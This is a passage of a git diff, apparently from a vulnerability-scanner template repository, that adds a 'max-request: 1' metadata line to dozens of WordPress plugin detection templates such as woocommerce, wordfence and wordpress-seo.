https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..1bb9a283ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 0af322b728..9d6afa8d3f 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: + max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index d4ac0d179e..87721a245a 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: + max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index dbbadf3cfc..45e0dead0e 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: + max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index 401b0e479f..abec174ec3 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: + max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 6f95506748..e088ac07a6 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: + max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 4404f87aab..8b163200bf 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: + max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8995434fce..2366a7dad7 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: + max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 8175806cb8..71448e61e8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: + max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index db82bc7f43..717554b89f 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: + max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 03ddae57bc..fba5c8b09c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: + max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d6449bb5bf..631202198e 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: + max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 2d5fdf1779..cc953078eb 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: + max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 6b5705e20d..97ce674116 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: + max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index dbcdb64bad..6d05a6f058 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index fb9ea502ce..baf5af3bb5 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: + max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 48ffb25245..aa1898c4ba 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 4fa6fc3ffe..5fae796fdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: + max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 1c1c690fcd..22f812e2b8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: + max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index 4d6702d81a..c637006d26 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: + max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 42cb8bc409..e020507ccb 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: + max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 55d6effbf5..c92903fd79 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: + max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 6786cab703..c25b2c1c48 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: + max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 784ba22c8a..4d6dd14d25 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: + max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 72ff55e58a..7ca0870ed6 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: + max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 8cfaa0f5a9..4f0d9be568 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: + max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 85900a01a7..f3c481b824 100644 --- 